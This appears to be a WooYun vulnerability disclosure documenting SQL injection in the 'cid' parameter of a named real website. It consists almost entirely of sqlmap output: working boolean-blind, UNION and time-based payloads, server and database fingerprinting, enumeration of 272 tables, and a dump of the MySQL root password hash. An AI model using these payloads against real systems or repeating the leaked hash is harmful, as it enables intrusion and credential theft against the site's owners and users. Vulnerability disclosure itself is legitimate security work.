WooYun.org

注入点：
http://www.nrdc.cn/our_program_flag.php?cid=256
参数cid过滤不严
Place: GET
Parameter: cid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=256' AND 9612=9612 AND 'zLsb'='zLsb
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: cid=-2398' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,CONCAT(0x7177706971,0x474b746a746f4b6b4a52,0x716b707971),NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cid=256' AND SLEEP(5) AND 'dwxf'='dwxf
---
[23:37:02] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.22, PHP 5.2.13
back-end DBMS: MySQL 5.0.11
[23:37:02] [INFO] fetching database names
[23:37:02] [INFO] the SQL query used returns 5 entries
[23:37:03] [INFO] retrieved: "information_schema"
[23:37:03] [INFO] retrieved: "mysql"
[23:37:03] [INFO] retrieved: "nrdc"
[23:37:04] [INFO] retrieved: "performance_schema"
[23:37:04] [INFO] retrieved: "test"
available databases [5]:
[*] information_schema
[*] mysql
[*] nrdc
[*] performance_schema
[*] test
Database: nrdc
[272 tables]
+---------------------------+
| blog_tou |
| ewp_13_commentmeta |
| ewp_13_comments |
| ewp_13_links |
| ewp_13_options |
| ewp_13_postmeta |
| ewp_13_posts |
| ewp_13_term_relationships |
| ewp_13_term_taxonomy |
| ewp_13_terms |
| ewp_14_commentmeta |
| ewp_14_comments |
| ewp_14_links |
| ewp_14_options |
| ewp_14_postmeta |
| ewp_14_posts |
| ewp_14_term_relationships |
| ewp_14_term_taxonomy |
| ewp_14_terms |
| ewp_15_commentmeta |
| ewp_15_comments |
| ewp_15_links |
| ewp_15_options |
| ewp_15_postmeta |
| ewp_15_posts |
| ewp_15_term_relationships |
| ewp_15_term_taxonomy |
| ewp_15_terms |
| ewp_16_commentmeta |
| ewp_16_comments |
| ewp_16_links |
| ewp_16_options |
| ewp_16_postmeta |
| ewp_16_posts |
| ewp_16_term_relationships |
| ewp_16_term_taxonomy |
| ewp_16_terms |
| ewp_17_commentmeta |
| ewp_17_comments |
| ewp_17_links |
| ewp_17_options |
| ewp_17_postmeta |
| ewp_17_posts |
| ewp_17_term_relationships |
| ewp_17_term_taxonomy |
| ewp_17_terms |
| ewp_2_commentmeta |
| ewp_2_comments |
| ewp_2_links |
| ewp_2_options |
| ewp_2_postmeta |
| ewp_2_posts |
| ewp_2_term_relationships |
| ewp_2_term_taxonomy |
| ewp_2_terms |
| ewp_3_commentmeta |
| ewp_3_comments |
| ewp_3_links |
| ewp_3_options |
| ewp_3_postmeta |
| ewp_3_posts |
| ewp_3_term_relationships |
| ewp_3_term_taxonomy |
| ewp_3_terms |
| ewp_4_commentmeta |
| ewp_4_comments |
| ewp_4_links |
| ewp_4_options |
| ewp_4_postmeta |
| ewp_4_posts |
| ewp_4_term_relationships |
| ewp_4_term_taxonomy |
| ewp_4_terms |
| ewp_5_commentmeta |
| ewp_5_comments |
| ewp_5_links |
| ewp_5_options |
| ewp_5_postmeta |
| ewp_5_posts |
| ewp_5_term_relationships |
| ewp_5_term_taxonomy |
| ewp_5_terms |
| ewp_6_commentmeta |
| ewp_6_comments |
| ewp_6_links |
| ewp_6_options |
| ewp_6_postmeta |
| ewp_6_posts |
| ewp_6_term_relationships |
| ewp_6_term_taxonomy |
| ewp_6_terms |
| ewp_7_commentmeta |
| ewp_7_comments |
| ewp_7_links |
| ewp_7_options |
| ewp_7_postmeta |
| ewp_7_posts |
| ewp_7_term_relationships |
| ewp_7_term_taxonomy |
| ewp_7_terms |
| ewp_8_commentmeta |
| ewp_8_comments |
| ewp_8_links |
| ewp_8_options |
| ewp_8_postmeta |
| ewp_8_posts |
| ewp_8_term_relationships |
| ewp_8_term_taxonomy |
| ewp_8_terms |
| ewp_blog_versions |
| ewp_blogs |
| ewp_commentmeta |
| ewp_comments |
| ewp_links |
| ewp_options |
| ewp_postmeta |
| ewp_posts |
| ewp_registration_log |
| ewp_signups |
| ewp_site |
| ewp_sitemeta |
| ewp_term_relationships |
| ewp_term_taxonomy |
| ewp_terms |
| ewp_usermeta |
| ewp_users |
| pc_a_down |
| pc_a_focus |
| pc_a_news |
| pc_a_newsfocus |
| pc_a_video |
| pc_admin |
| pc_application |
| pc_article |
| pc_attachment |
| pc_column |
| pc_faq |
| pc_log |
| pc_media_contact |
| pc_model |
| pc_model_field |
| pc_signup |
| pc_subscribe |
| pc_template |
| pc_volunteers |
| su_answer |
| su_ip |
| su_question |
| su_survey |
| wp_15_commentmeta |
| wp_15_comments |
| wp_15_links |
| wp_15_options |
| wp_15_postmeta |
| wp_15_posts |
| wp_15_term_relationships |
| wp_15_term_taxonomy |
| wp_15_terms |
| wp_16_commentmeta |
| wp_16_comments |
| wp_16_links |
| wp_16_options |
| wp_16_postmeta |
| wp_16_posts |
| wp_16_term_relationships |
| wp_16_term_taxonomy |
| wp_16_terms |
| wp_17_commentmeta |
| wp_17_comments |
| wp_17_links |
| wp_17_options |
| wp_17_postmeta |
| wp_17_posts |
| wp_17_term_relationships |
| wp_17_term_taxonomy |
| wp_17_terms |
| wp_19_commentmeta |
| wp_19_comments |
| wp_19_links |
| wp_19_options |
| wp_19_postmeta |
| wp_19_posts |
| wp_19_term_relationships |
| wp_19_term_taxonomy |
| wp_19_terms |
| wp_21_commentmeta |
| wp_21_comments |
| wp_21_links |
| wp_21_options |
| wp_21_postmeta |
| wp_21_posts |
| wp_21_postviews_plus |
| wp_21_term_relationships |
| wp_21_term_taxonomy |
| wp_21_terms |
| wp_23_commentmeta |
| wp_23_comments |
| wp_23_links |
| wp_23_options |
| wp_23_postmeta |
| wp_23_posts |
| wp_23_term_relationships |
| wp_23_term_taxonomy |
| wp_23_terms |
| wp_24_commentmeta |
| wp_24_comments |
| wp_24_links |
| wp_24_options |
| wp_24_postmeta |
| wp_24_posts |
| wp_24_term_relationships |
| wp_24_term_taxonomy |
| wp_24_terms |
| wp_25_commentmeta |
| wp_25_comments |
| wp_25_links |
| wp_25_options |
| wp_25_postmeta |
| wp_25_posts |
| wp_25_term_relationships |
| wp_25_term_taxonomy |
| wp_25_terms |
| wp_26_commentmeta |
| wp_26_comments |
| wp_26_links |
| wp_26_options |
| wp_26_postmeta |
| wp_26_posts |
| wp_26_term_relationships |
| wp_26_term_taxonomy |
| wp_26_terms |
| wp_27_commentmeta |
| wp_27_comments |
| wp_27_links |
| wp_27_options |
| wp_27_postmeta |
| wp_27_posts |
| wp_27_term_relationships |
| wp_27_term_taxonomy |
| wp_27_terms |
| wp_28_commentmeta |
| wp_28_comments |
| wp_28_links |
| wp_28_options |
| wp_28_postmeta |
| wp_28_posts |
| wp_28_term_relationships |
| wp_28_term_taxonomy |
| wp_28_terms |
| wp_29_commentmeta |
| wp_29_comments |
| wp_29_links |
| wp_29_options |
| wp_29_postmeta |
| wp_29_posts |
| wp_29_term_relationships |
| wp_29_term_taxonomy |
| wp_29_terms |
| wp_30_commentmeta |
| wp_30_comments |
| wp_30_links |
| wp_30_options |
| wp_30_postmeta |
| wp_30_posts |
| wp_30_postviews_plus |
| wp_30_term_relationships |
| wp_30_term_taxonomy |
| wp_30_terms |
| wp_31_commentmeta |
| wp_31_comments |
| wp_31_links |
| wp_31_options |
.......
Database: mysql
[24 tables]
+---------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------+
Database: mysql
Table: user
[42 columns]
+------------------------+-----------------------------------+
| Column | Type |
+------------------------+-----------------------------------+
| User | char(16) |
| Alter_priv | enum('N','Y') |
| Alter_routine_priv | enum('N','Y') |
| authentication_string | text |
| Create_priv | enum('N','Y') |
| Create_routine_priv | enum('N','Y') |
| Create_tablespace_priv | enum('N','Y') |
| Create_tmp_table_priv | enum('N','Y') |
| Create_user_priv | enum('N','Y') |
| Create_view_priv | enum('N','Y') |
| Delete_priv | enum('N','Y') |
| Drop_priv | enum('N','Y') |
| Event_priv | enum('N','Y') |
| Execute_priv | enum('N','Y') |
| File_priv | enum('N','Y') |
| Grant_priv | enum('N','Y') |
| Host | char(60) |
| Index_priv | enum('N','Y') |
| Insert_priv | enum('N','Y') |
| Lock_tables_priv | enum('N','Y') |
| max_connections | int(11) unsigned |
| max_questions | int(11) unsigned |
| max_updates | int(11) unsigned |
| max_user_connections | int(11) unsigned |
| Password | char(41) |
| plugin | char(64) |
| Process_priv | enum('N','Y') |
| References_priv | enum('N','Y') |
| Reload_priv | enum('N','Y') |
| Repl_client_priv | enum('N','Y') |
| Repl_slave_priv | enum('N','Y') |
| Select_priv | enum('N','Y') |
| Show_db_priv | enum('N','Y') |
| Show_view_priv | enum('N','Y') |
| Shutdown_priv | enum('N','Y') |
| ssl_cipher | blob |
| ssl_type | enum('','ANY','X509','SPECIFIED') |
| Super_priv | enum('N','Y') |
| Trigger_priv | enum('N','Y') |
| Update_priv | enum('N','Y') |
| x509_issuer | blob |
| x509_subject | blob |
+------------------------+-----------------------------------+
Database: mysql
Table: user
[3 entries]
+--------+-------------------------------------------+
| User | Password |
+--------+-------------------------------------------+
| root | *26C53E6C886B01669876B6CF02CF6403E424B7E4 |
| root | *26C53E6C886B01669876B6CF02CF6403E424B7E4 |
| root | *26C53E6C886B01669876B6CF02CF6403E424B7E4 |
+--------+-------------------------------------------+